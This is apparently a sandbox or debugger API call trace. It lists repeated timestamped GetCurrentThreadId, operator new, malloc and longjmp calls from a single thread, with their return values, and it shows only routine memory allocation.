	[0054.405] GetCurrentThreadId () returned 0x9a8
	[0054.405] GetCurrentThreadId () returned 0x9a8
	[0054.405] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.405] malloc (_Size=0x80) returned 0x3c8b80
	[0054.420] GetCurrentThreadId () returned 0x9a8
	[0054.421] GetCurrentThreadId () returned 0x9a8
	[0054.421] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.421] malloc (_Size=0x80) returned 0x3c8310
	[0054.423] GetCurrentThreadId () returned 0x9a8
	[0054.423] GetCurrentThreadId () returned 0x9a8
	[0054.423] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.423] malloc (_Size=0x80) returned 0x3c8670
	[0054.425] GetCurrentThreadId () returned 0x9a8
	[0054.425] GetCurrentThreadId () returned 0x9a8
	[0054.425] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.425] malloc (_Size=0x80) returned 0x3c8a60
	[0054.450] GetCurrentThreadId () returned 0x9a8
	[0054.450] GetCurrentThreadId () returned 0x9a8
	[0054.450] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.450] malloc (_Size=0x80) returned 0x3c8820
	[0054.452] GetCurrentThreadId () returned 0x9a8
	[0054.452] GetCurrentThreadId () returned 0x9a8
	[0054.452] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.452] malloc (_Size=0x80) returned 0x3c8a60
	[0054.452] GetCurrentThreadId () returned 0x9a8
	[0054.452] GetCurrentThreadId () returned 0x9a8
	[0054.452] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0054.452] malloc (_Size=0x80) returned 0x3c84c0
	[0054.452] GetCurrentThreadId () returned 0x9a8
	[0054.452] GetCurrentThreadId () returned 0x9a8
	[0054.452] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0054.453] malloc (_Size=0x80) returned 0x3c8700
	[0054.486] GetCurrentThreadId () returned 0x9a8
	[0054.486] GetCurrentThreadId () returned 0x9a8
	[0054.486] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0054.486] malloc (_Size=0x80) returned 0x3c8790
	[0054.508] GetCurrentThreadId () returned 0x9a8
	[0054.508] GetCurrentThreadId () returned 0x9a8
	[0054.508] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.509] malloc (_Size=0x80) returned 0x3c8670
	[0054.515] GetCurrentThreadId () returned 0x9a8
	[0054.515] GetCurrentThreadId () returned 0x9a8
	[0054.515] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.515] malloc (_Size=0x80) returned 0x3c8670
	[0054.515] GetCurrentThreadId () returned 0x9a8
	[0054.515] GetCurrentThreadId () returned 0x9a8
	[0054.515] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.515] malloc (_Size=0x80) returned 0x3c8790
	[0054.521] GetCurrentThreadId () returned 0x9a8
	[0054.521] GetCurrentThreadId () returned 0x9a8
	[0054.521] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.521] malloc (_Size=0x80) returned 0x3c8820
	[0054.521] GetCurrentThreadId () returned 0x9a8
	[0054.521] GetCurrentThreadId () returned 0x9a8
	[0054.522] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0054.522] malloc (_Size=0x80) returned 0x3c8430
	[0054.522] GetCurrentThreadId () returned 0x9a8
	[0054.522] GetCurrentThreadId () returned 0x9a8
	[0054.523] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0054.523] malloc (_Size=0x80) returned 0x3c8940
	[0054.527] GetCurrentThreadId () returned 0x9a8
	[0054.527] GetCurrentThreadId () returned 0x9a8
	[0054.527] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.527] malloc (_Size=0x80) returned 0x3c8820
	[0054.530] GetCurrentThreadId () returned 0x9a8
	[0054.530] GetCurrentThreadId () returned 0x9a8
	[0054.530] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.530] malloc (_Size=0x80) returned 0x3c8b80
	[0054.531] GetCurrentThreadId () returned 0x9a8
	[0054.531] GetCurrentThreadId () returned 0x9a8
	[0054.531] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0054.531] malloc (_Size=0x80) returned 0x3c8700
	[0054.535] GetCurrentThreadId () returned 0x9a8
	[0054.535] GetCurrentThreadId () returned 0x9a8
	[0054.535] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0054.535] malloc (_Size=0x80) returned 0x3c8a60
	[0054.537] GetCurrentThreadId () returned 0x9a8
	[0054.537] GetCurrentThreadId () returned 0x9a8
	[0054.537] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.537] malloc (_Size=0x80) returned 0x3c8b80
	[0054.552] GetCurrentThreadId () returned 0x9a8
	[0054.552] GetCurrentThreadId () returned 0x9a8
	[0054.553] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0054.553] malloc (_Size=0x80) returned 0x3c8820
	[0054.558] GetCurrentThreadId () returned 0x9a8
	[0054.558] GetCurrentThreadId () returned 0x9a8
	[0054.558] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0054.558] malloc (_Size=0x80) returned 0x3c8ca0
	[0054.559] GetCurrentThreadId () returned 0x9a8
	[0054.559] GetCurrentThreadId () returned 0x9a8
	[0054.559] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.559] malloc (_Size=0x80) returned 0x3c8670
	[0054.559] GetCurrentThreadId () returned 0x9a8
	[0054.559] GetCurrentThreadId () returned 0x9a8
	[0054.559] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.559] malloc (_Size=0x80) returned 0x3c8430
	[0054.560] GetCurrentThreadId () returned 0x9a8
	[0054.560] GetCurrentThreadId () returned 0x9a8
	[0054.560] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0054.560] malloc (_Size=0x80) returned 0x3c8700
	[0054.562] GetCurrentThreadId () returned 0x9a8
	[0054.562] GetCurrentThreadId () returned 0x9a8
	[0054.562] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.562] malloc (_Size=0x80) returned 0x3c8b80
	[0054.563] GetCurrentThreadId () returned 0x9a8
	[0054.563] GetCurrentThreadId () returned 0x9a8
	[0054.563] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.564] malloc (_Size=0x80) returned 0x3c8310
	[0054.564] GetCurrentThreadId () returned 0x9a8
	[0054.564] GetCurrentThreadId () returned 0x9a8
	[0054.564] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0054.564] malloc (_Size=0x80) returned 0x3c8a60
	[0054.566] GetCurrentThreadId () returned 0x9a8
	[0054.566] GetCurrentThreadId () returned 0x9a8
	[0054.566] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.566] malloc (_Size=0x80) returned 0x3c8820
	[0054.567] GetCurrentThreadId () returned 0x9a8
	[0054.567] GetCurrentThreadId () returned 0x9a8
	[0054.567] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.567] malloc (_Size=0x80) returned 0x3c8430
	[0054.570] GetCurrentThreadId () returned 0x9a8
	[0054.570] GetCurrentThreadId () returned 0x9a8
	[0054.570] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.570] malloc (_Size=0x80) returned 0x3c8670
	[0054.570] GetCurrentThreadId () returned 0x9a8
	[0054.571] GetCurrentThreadId () returned 0x9a8
	[0054.571] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.571] malloc (_Size=0x80) returned 0x3c8310
	[0054.578] GetCurrentThreadId () returned 0x9a8
	[0054.578] GetCurrentThreadId () returned 0x9a8
	[0054.578] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.578] malloc (_Size=0x80) returned 0x3c8820
	[0054.579] GetCurrentThreadId () returned 0x9a8
	[0054.579] GetCurrentThreadId () returned 0x9a8
	[0054.579] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.579] malloc (_Size=0x80) returned 0x3c8430
	[0054.582] GetCurrentThreadId () returned 0x9a8
	[0054.582] GetCurrentThreadId () returned 0x9a8
	[0054.582] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.582] malloc (_Size=0x80) returned 0x3c8670
	[0054.582] GetCurrentThreadId () returned 0x9a8
	[0054.582] GetCurrentThreadId () returned 0x9a8
	[0054.582] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.582] malloc (_Size=0x80) returned 0x3c8310
	[0054.589] GetCurrentThreadId () returned 0x9a8
	[0054.589] GetCurrentThreadId () returned 0x9a8
	[0054.589] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.589] malloc (_Size=0x80) returned 0x3c8b80
	[0054.590] GetCurrentThreadId () returned 0x9a8
	[0054.590] GetCurrentThreadId () returned 0x9a8
	[0054.590] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.590] malloc (_Size=0x80) returned 0x3c8430
	[0054.598] GetCurrentThreadId () returned 0x9a8
	[0054.598] GetCurrentThreadId () returned 0x9a8
	[0054.598] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.598] malloc (_Size=0x80) returned 0x3c8820
	[0054.599] GetCurrentThreadId () returned 0x9a8
	[0054.599] GetCurrentThreadId () returned 0x9a8
	[0054.599] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.599] malloc (_Size=0x80) returned 0x3c8310
	[0054.601] GetCurrentThreadId () returned 0x9a8
	[0054.601] GetCurrentThreadId () returned 0x9a8
	[0054.601] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.601] malloc (_Size=0x80) returned 0x3c8670
	[0054.601] GetCurrentThreadId () returned 0x9a8
	[0054.601] GetCurrentThreadId () returned 0x9a8
	[0054.601] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.601] malloc (_Size=0x80) returned 0x3c8430
	[0054.604] GetCurrentThreadId () returned 0x9a8
	[0054.604] GetCurrentThreadId () returned 0x9a8
	[0054.604] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.604] malloc (_Size=0x80) returned 0x3c8b80
	[0054.606] GetCurrentThreadId () returned 0x9a8
	[0054.606] GetCurrentThreadId () returned 0x9a8
	[0054.606] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.606] malloc (_Size=0x80) returned 0x3c8310
	[0054.609] GetCurrentThreadId () returned 0x9a8
	[0054.609] GetCurrentThreadId () returned 0x9a8
	[0054.609] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.609] malloc (_Size=0x80) returned 0x3c8820
	[0054.610] GetCurrentThreadId () returned 0x9a8
	[0054.610] GetCurrentThreadId () returned 0x9a8
	[0054.610] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.610] malloc (_Size=0x80) returned 0x3c8430
	[0054.615] GetCurrentThreadId () returned 0x9a8
	[0054.615] GetCurrentThreadId () returned 0x9a8
	[0054.615] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.615] malloc (_Size=0x80) returned 0x3c8670
	[0054.616] GetCurrentThreadId () returned 0x9a8
	[0054.616] GetCurrentThreadId () returned 0x9a8
	[0054.616] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.616] malloc (_Size=0x80) returned 0x3c8310
	[0054.619] GetCurrentThreadId () returned 0x9a8
	[0054.619] GetCurrentThreadId () returned 0x9a8
	[0054.619] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.619] malloc (_Size=0x80) returned 0x3c8820
	[0054.620] GetCurrentThreadId () returned 0x9a8
	[0054.620] GetCurrentThreadId () returned 0x9a8
	[0054.620] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.620] malloc (_Size=0x80) returned 0x3c8430
	[0054.628] GetCurrentThreadId () returned 0x9a8
	[0054.628] GetCurrentThreadId () returned 0x9a8
	[0054.628] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.628] malloc (_Size=0x80) returned 0x3c8b80
	[0054.629] GetCurrentThreadId () returned 0x9a8
	[0054.629] GetCurrentThreadId () returned 0x9a8
	[0054.629] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.629] malloc (_Size=0x80) returned 0x3c8310
	[0054.630] longjmp () 
	[0054.634] GetCurrentThreadId () returned 0x9a8
	[0054.634] GetCurrentThreadId () returned 0x9a8
	[0054.634] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0054.634] malloc (_Size=0x80) returned 0x3c8670
	[0054.634] GetCurrentThreadId () returned 0x9a8
	[0054.634] GetCurrentThreadId () returned 0x9a8
	[0054.634] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.634] malloc (_Size=0x80) returned 0x3c8820
	[0054.635] longjmp () 
	[0054.637] GetCurrentThreadId () returned 0x9a8
	[0054.637] GetCurrentThreadId () returned 0x9a8
	[0054.637] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0054.637] malloc (_Size=0x80) returned 0x3c8670
	[0054.641] longjmp () 
	[0054.642] GetCurrentThreadId () returned 0x9a8
	[0054.642] GetCurrentThreadId () returned 0x9a8
	[0054.642] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0054.642] malloc (_Size=0x80) returned 0x3c88b0
	[0054.642] GetCurrentThreadId () returned 0x9a8
	[0054.642] GetCurrentThreadId () returned 0x9a8
	[0054.642] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0054.642] malloc (_Size=0x80) returned 0x3c8ca0
	[0054.643] GetCurrentThreadId () returned 0x9a8
	[0054.643] GetCurrentThreadId () returned 0x9a8
	[0054.643] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.643] malloc (_Size=0x80) returned 0x3c8b80
	[0054.643] GetCurrentThreadId () returned 0x9a8
	[0054.643] GetCurrentThreadId () returned 0x9a8
	[0054.643] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.643] malloc (_Size=0x80) returned 0x3c8430
	[0054.644] GetCurrentThreadId () returned 0x9a8
	[0054.644] GetCurrentThreadId () returned 0x9a8
	[0054.644] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0054.644] malloc (_Size=0x80) returned 0x3c8700
	[0054.644] GetCurrentThreadId () returned 0x9a8
	[0054.644] GetCurrentThreadId () returned 0x9a8
	[0054.644] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0054.644] malloc (_Size=0x80) returned 0x3c84c0
	[0054.648] GetCurrentThreadId () returned 0x9a8
	[0054.648] GetCurrentThreadId () returned 0x9a8
	[0054.648] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0054.648] malloc (_Size=0x80) returned 0x3c8af0
	[0054.652] GetCurrentThreadId () returned 0x9a8
	[0054.652] GetCurrentThreadId () returned 0x9a8
	[0054.652] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0054.652] malloc (_Size=0x80) returned 0x3c8940
	[0054.654] longjmp () 
	[0054.655] GetCurrentThreadId () returned 0x9a8
	[0054.655] GetCurrentThreadId () returned 0x9a8
	[0054.655] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0054.655] malloc (_Size=0x80) returned 0x3c84c0
	[0054.656] GetCurrentThreadId () returned 0x9a8
	[0054.656] GetCurrentThreadId () returned 0x9a8
	[0054.656] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0054.656] malloc (_Size=0x80) returned 0x3c8a60
	[0054.657] GetCurrentThreadId () returned 0x9a8
	[0054.657] GetCurrentThreadId () returned 0x9a8
	[0054.657] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0054.657] malloc (_Size=0x80) returned 0x3c8af0
	[0054.657] GetCurrentThreadId () returned 0x9a8
	[0054.657] GetCurrentThreadId () returned 0x9a8
	[0054.657] ??2@YAPEAX_K@Z () returned 0x3e4700
	[0054.657] malloc (_Size=0x80) returned 0x3c8d30
	[0054.658] GetCurrentThreadId () returned 0x9a8
	[0054.658] GetCurrentThreadId () returned 0x9a8
	[0054.658] ??2@YAPEAX_K@Z () returned 0x3e4800
	[0054.658] malloc (_Size=0x80) returned 0x3c8c10
	[0054.659] GetCurrentThreadId () returned 0x9a8
	[0054.659] GetCurrentThreadId () returned 0x9a8
	[0054.659] ??2@YAPEAX_K@Z () returned 0x3e4900
	[0054.659] malloc (_Size=0x80) returned 0x3c8e50
	[0054.660] GetCurrentThreadId () returned 0x9a8
	[0054.660] GetCurrentThreadId () returned 0x9a8
	[0054.660] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0054.660] malloc (_Size=0x80) returned 0x3c8d30
	[0054.665] GetCurrentThreadId () returned 0x9a8
	[0054.665] GetCurrentThreadId () returned 0x9a8
	[0054.665] ??2@YAPEAX_K@Z () returned 0x3e4700
	[0054.665] malloc (_Size=0x80) returned 0x3c8c10
	[0054.682] GetCurrentThreadId () returned 0x9a8
	[0054.682] GetCurrentThreadId () returned 0x9a8
	[0054.682] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0054.682] malloc (_Size=0x80) returned 0x3c8700
	[0054.683] GetCurrentThreadId () returned 0x9a8
	[0054.683] GetCurrentThreadId () returned 0x9a8
	[0054.683] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0054.683] malloc (_Size=0x80) returned 0x3c8790
	[0054.687] GetCurrentThreadId () returned 0x9a8
	[0054.687] GetCurrentThreadId () returned 0x9a8
	[0054.687] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0054.687] malloc (_Size=0x80) returned 0x3c8940
	[0054.688] GetCurrentThreadId () returned 0x9a8
	[0054.688] GetCurrentThreadId () returned 0x9a8
	[0054.688] ??2@YAPEAX_K@Z () returned 0x3e4700
	[0054.688] malloc (_Size=0x80) returned 0x3c8550
	[0054.695] GetCurrentThreadId () returned 0x9a8
	[0054.695] GetCurrentThreadId () returned 0x9a8
	[0054.695] ??2@YAPEAX_K@Z () returned 0x3e4700
	[0054.695] malloc (_Size=0x80) returned 0x3c8d30
	[0054.724] GetCurrentThreadId () returned 0x9a8
	[0054.724] GetCurrentThreadId () returned 0x9a8
	[0054.724] ??2@YAPEAX_K@Z () returned 0x3e4900
	[0054.724] malloc (_Size=0x80) returned 0x3c8e50
	[0054.725] GetCurrentThreadId () returned 0x9a8
	[0054.725] GetCurrentThreadId () returned 0x9a8
	[0054.725] ??2@YAPEAX_K@Z () returned 0x3e4a00
	[0054.725] malloc (_Size=0x80) returned 0x3c8ee0
	[0054.729] GetCurrentThreadId () returned 0x9a8
	[0054.729] GetCurrentThreadId () returned 0x9a8
	[0054.729] ??2@YAPEAX_K@Z () returned 0x3e4b00
	[0054.729] malloc (_Size=0x80) returned 0x3c9000
	[0054.732] GetCurrentThreadId () returned 0x9a8
	[0054.732] GetCurrentThreadId () returned 0x9a8
	[0054.732] ??2@YAPEAX_K@Z () returned 0x3e4c00
	[0054.732] malloc (_Size=0x80) returned 0x3c9120
	[0054.781] GetCurrentThreadId () returned 0x9a8
	[0054.781] GetCurrentThreadId () returned 0x9a8
	[0054.781] ??2@YAPEAX_K@Z () returned 0x3e4800
	[0054.781] malloc (_Size=0x80) returned 0x3c8dc0
	[0054.785] GetCurrentThreadId () returned 0x9a8
	[0054.785] GetCurrentThreadId () returned 0x9a8
	[0054.785] ??2@YAPEAX_K@Z () returned 0x3e4b00
	[0054.785] malloc (_Size=0x80) returned 0x3c9120
	[0054.788] GetCurrentThreadId () returned 0x9a8
	[0054.788] GetCurrentThreadId () returned 0x9a8
	[0054.788] ??2@YAPEAX_K@Z () returned 0x3e4c00
	[0054.788] malloc (_Size=0x80) returned 0x3c91b0
	[0054.836] GetCurrentThreadId () returned 0x9a8
	[0054.836] GetCurrentThreadId () returned 0x9a8
	[0054.836] ??2@YAPEAX_K@Z () returned 0x3e4a00
	[0054.836] malloc (_Size=0x80) returned 0x3c85e0
	[0054.840] GetCurrentThreadId () returned 0x9a8
	[0054.840] GetCurrentThreadId () returned 0x9a8
	[0054.840] ??2@YAPEAX_K@Z () returned 0x3e4b00
	[0054.840] malloc (_Size=0x80) returned 0x3c91b0
	[0054.843] GetCurrentThreadId () returned 0x9a8
	[0054.843] GetCurrentThreadId () returned 0x9a8
	[0054.843] ??2@YAPEAX_K@Z () returned 0x3e4c00
	[0054.843] malloc (_Size=0x80) returned 0x3c9090
	[0054.895] GetCurrentThreadId () returned 0x9a8
	[0054.895] GetCurrentThreadId () returned 0x9a8
	[0054.895] ??2@YAPEAX_K@Z () returned 0x3e4800
	[0054.895] malloc (_Size=0x80) returned 0x3c8ee0
	[0054.901] GetCurrentThreadId () returned 0x9a8
	[0054.901] GetCurrentThreadId () returned 0x9a8
	[0054.901] ??2@YAPEAX_K@Z () returned 0x3e4b00
	[0054.901] malloc (_Size=0x80) returned 0x3c9090
	[0054.905] GetCurrentThreadId () returned 0x9a8
	[0054.905] GetCurrentThreadId () returned 0x9a8
	[0054.905] ??2@YAPEAX_K@Z () returned 0x3e4c00
	[0054.905] malloc (_Size=0x80) returned 0x3c8f70
	[0054.976] GetCurrentThreadId () returned 0x9a8
	[0054.976] GetCurrentThreadId () returned 0x9a8
	[0054.976] ??2@YAPEAX_K@Z () returned 0x3e4a00
	[0054.976] malloc (_Size=0x80) returned 0x3c8dc0
	[0054.979] GetCurrentThreadId () returned 0x9a8
	[0054.979] GetCurrentThreadId () returned 0x9a8
	[0054.979] ??2@YAPEAX_K@Z () returned 0x3e4b00
	[0054.979] malloc (_Size=0x80) returned 0x3c8f70
	[0054.982] GetCurrentThreadId () returned 0x9a8
	[0054.982] GetCurrentThreadId () returned 0x9a8
	[0054.982] ??2@YAPEAX_K@Z () returned 0x3e4c00
	[0054.982] malloc (_Size=0x80) returned 0x3c9120
	[0055.038] GetCurrentThreadId () returned 0x9a8
	[0055.038] GetCurrentThreadId () returned 0x9a8
	[0055.038] ??2@YAPEAX_K@Z () returned 0x3e4800
	[0055.038] malloc (_Size=0x80) returned 0x3c85e0
	[0055.041] GetCurrentThreadId () returned 0x9a8
	[0055.041] GetCurrentThreadId () returned 0x9a8
	[0055.041] ??2@YAPEAX_K@Z () returned 0x3e4b00
	[0055.041] malloc (_Size=0x80) returned 0x3c9120
	[0055.046] GetCurrentThreadId () returned 0x9a8
	[0055.046] GetCurrentThreadId () returned 0x9a8
	[0055.047] ??2@YAPEAX_K@Z () returned 0x3e4c00
	[0055.047] malloc (_Size=0x80) returned 0x3c9000
	[0055.125] GetCurrentThreadId () returned 0x9a8
	[0055.125] GetCurrentThreadId () returned 0x9a8
	[0055.125] ??2@YAPEAX_K@Z () returned 0x3e4a00
	[0055.125] malloc (_Size=0x80) returned 0x3c8ee0
	[0055.129] GetCurrentThreadId () returned 0x9a8
	[0055.129] GetCurrentThreadId () returned 0x9a8
	[0055.129] ??2@YAPEAX_K@Z () returned 0x3e4b00
	[0055.129] malloc (_Size=0x80) returned 0x3c9000
	[0055.141] GetCurrentThreadId () returned 0x9a8
	[0055.141] GetCurrentThreadId () returned 0x9a8
	[0055.141] ??2@YAPEAX_K@Z () returned 0x3e4c00
	[0055.141] malloc (_Size=0x80) returned 0x3c9090
	[0055.185] GetCurrentThreadId () returned 0x9a8
	[0055.185] GetCurrentThreadId () returned 0x9a8
	[0055.185] ??2@YAPEAX_K@Z () returned 0x3e4800
	[0055.185] malloc (_Size=0x80) returned 0x3c8dc0
	[0055.189] GetCurrentThreadId () returned 0x9a8
	[0055.189] GetCurrentThreadId () returned 0x9a8
	[0055.189] ??2@YAPEAX_K@Z () returned 0x3e4b00
	[0055.189] malloc (_Size=0x80) returned 0x3c9090
	[0055.192] GetCurrentThreadId () returned 0x9a8
	[0055.192] GetCurrentThreadId () returned 0x9a8
	[0055.192] ??2@YAPEAX_K@Z () returned 0x3e4c00
	[0055.192] malloc (_Size=0x80) returned 0x3c91b0
	[0055.230] GetCurrentThreadId () returned 0x9a8
	[0055.230] GetCurrentThreadId () returned 0x9a8
	[0055.230] ??2@YAPEAX_K@Z () returned 0x3e4a00
	[0055.230] malloc (_Size=0x80) returned 0x3c85e0
	[0055.234] GetCurrentThreadId () returned 0x9a8
	[0055.234] GetCurrentThreadId () returned 0x9a8
	[0055.234] ??2@YAPEAX_K@Z () returned 0x3e4b00
	[0055.234] malloc (_Size=0x80) returned 0x3c91b0
	[0055.247] GetCurrentThreadId () returned 0x9a8
	[0055.247] GetCurrentThreadId () returned 0x9a8
	[0055.247] ??2@YAPEAX_K@Z () returned 0x3e4c00
	[0055.247] malloc (_Size=0x80) returned 0x3c9120
	[0055.320] GetCurrentThreadId () returned 0x9a8
	[0055.320] GetCurrentThreadId () returned 0x9a8
	[0055.320] ??2@YAPEAX_K@Z () returned 0x3e4900
	[0055.320] malloc (_Size=0x80) returned 0x3c8dc0
	[0055.333] GetCurrentThreadId () returned 0x9a8
	[0055.333] GetCurrentThreadId () returned 0x9a8
	[0055.333] ??2@YAPEAX_K@Z () returned 0x3e4900
	[0055.333] malloc (_Size=0x80) returned 0x3c8c10
	[0055.341] GetCurrentThreadId () returned 0x9a8
	[0055.341] GetCurrentThreadId () returned 0x9a8
	[0055.341] ??2@YAPEAX_K@Z () returned 0x3e4900
	[0055.341] malloc (_Size=0x80) returned 0x3c8dc0
	[0055.360] longjmp () 
	[0055.361] GetCurrentThreadId () returned 0x9a8
	[0055.361] GetCurrentThreadId () returned 0x9a8
	[0055.361] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0055.361] malloc (_Size=0x80) returned 0x3c8a60
	[0055.367] GetCurrentThreadId () returned 0x9a8
	[0055.367] GetCurrentThreadId () returned 0x9a8
	[0055.367] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0055.367] malloc (_Size=0x80) returned 0x3c8af0
	[0055.408] GetCurrentThreadId () returned 0x9a8
	[0055.408] GetCurrentThreadId () returned 0x9a8
	[0055.408] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0055.408] malloc (_Size=0x80) returned 0x3c8940
	[0055.415] GetCurrentThreadId () returned 0x9a8
	[0055.416] GetCurrentThreadId () returned 0x9a8
	[0055.416] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0055.416] malloc (_Size=0x80) returned 0x3c8940
	[0055.460] GetCurrentThreadId () returned 0x9a8
	[0055.460] GetCurrentThreadId () returned 0x9a8
	[0055.460] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0055.460] malloc (_Size=0x80) returned 0x3c8790
	[0055.461] GetCurrentThreadId () returned 0x9a8
	[0055.461] GetCurrentThreadId () returned 0x9a8
	[0055.461] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0055.461] malloc (_Size=0x80) returned 0x3c8700
	[0055.463] GetCurrentThreadId () returned 0x9a8
	[0055.463] GetCurrentThreadId () returned 0x9a8
	[0055.463] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0055.463] malloc (_Size=0x80) returned 0x3c8550
	[0055.476] GetCurrentThreadId () returned 0x9a8
	[0055.476] GetCurrentThreadId () returned 0x9a8
	[0055.476] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0055.476] malloc (_Size=0x80) returned 0x3c8550
	[0055.477] GetCurrentThreadId () returned 0x9a8
	[0055.477] GetCurrentThreadId () returned 0x9a8
	[0055.477] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0055.477] malloc (_Size=0x80) returned 0x3c8940
	[0055.477] GetCurrentThreadId () returned 0x9a8
	[0055.477] GetCurrentThreadId () returned 0x9a8
	[0055.477] ??2@YAPEAX_K@Z () returned 0x3e4700
	[0055.477] malloc (_Size=0x80) returned 0x3c8c10
	[0055.533] GetCurrentThreadId () returned 0x9a8
	[0055.533] GetCurrentThreadId () returned 0x9a8
	[0055.533] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0055.533] malloc (_Size=0x80) returned 0x3c8af0
	[0055.534] GetCurrentThreadId () returned 0x9a8
	[0055.534] GetCurrentThreadId () returned 0x9a8
	[0055.534] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0055.534] malloc (_Size=0x80) returned 0x3c8c10
	[0055.536] GetCurrentThreadId () returned 0x9a8
	[0055.536] GetCurrentThreadId () returned 0x9a8
	[0055.536] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0055.536] malloc (_Size=0x80) returned 0x3c8700
	[0055.596] GetCurrentThreadId () returned 0x9a8
	[0055.596] GetCurrentThreadId () returned 0x9a8
	[0055.596] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0055.596] malloc (_Size=0x80) returned 0x3c8940
	[0055.631] GetCurrentThreadId () returned 0x9a8
	[0055.631] GetCurrentThreadId () returned 0x9a8
	[0055.631] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0055.631] malloc (_Size=0x80) returned 0x3c8c10
	[0055.632] GetCurrentThreadId () returned 0x9a8
	[0055.632] GetCurrentThreadId () returned 0x9a8
	[0055.633] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0055.633] malloc (_Size=0x80) returned 0x3c8dc0
	[0055.640] GetCurrentThreadId () returned 0x9a8
	[0055.640] GetCurrentThreadId () returned 0x9a8
	[0055.640] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0055.640] malloc (_Size=0x80) returned 0x3c8700
	[0055.640] GetCurrentThreadId () returned 0x9a8
	[0055.640] GetCurrentThreadId () returned 0x9a8
	[0055.640] ??2@YAPEAX_K@Z () returned 0x3e4700
	[0055.640] malloc (_Size=0x80) returned 0x3c8790
	[0055.642] GetCurrentThreadId () returned 0x9a8
	[0055.642] GetCurrentThreadId () returned 0x9a8
	[0055.642] ??2@YAPEAX_K@Z () returned 0x3e4700
	[0055.642] malloc (_Size=0x80) returned 0x3c84c0
	[0055.642] GetCurrentThreadId () returned 0x9a8
	[0055.642] GetCurrentThreadId () returned 0x9a8
	[0055.642] ??2@YAPEAX_K@Z () returned 0x3e4900
	[0055.643] malloc (_Size=0x80) returned 0x3c8e50
	[0055.646] GetCurrentThreadId () returned 0x9a8
	[0055.646] GetCurrentThreadId () returned 0x9a8
	[0055.646] ??2@YAPEAX_K@Z () returned 0x3e4600
